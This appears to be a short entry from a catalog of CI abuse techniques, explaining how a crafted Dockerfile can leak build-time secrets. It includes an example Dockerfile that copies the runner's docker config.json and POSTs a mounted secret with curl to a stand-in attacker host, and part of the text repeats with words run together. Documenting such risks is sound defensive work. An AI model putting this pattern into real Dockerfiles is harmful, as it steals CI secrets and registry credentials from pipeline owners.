docker is tool to build / inspect OCI images and run containers. The build stage can be configured with Dockerfile
Configuration files
Dockerfile
Exfiltration scenario
In the case where build-time secrets are exposed to docker build, a maliciously crafted Dockerfile could allow exfiltration of the secrets
FROM ubuntu:latest
ADD /home/runner/.docker/config.json config.json
RUN ...
RUN --mount=type=secret,id=mysecret \
sh -c 'curl -X POST -d "@/run/secrets/mysecret" http://malicious-server.example.com'
Description of the LOTP tool
dockeris tool to build / inspect OCI images and run containers. The build stage can be configured withDockerfileConfiguration files
Exfiltration scenario
In the case where build-time secrets are exposed to
docker build, a maliciously craftedDockerfilecould allow exfiltration of the secrets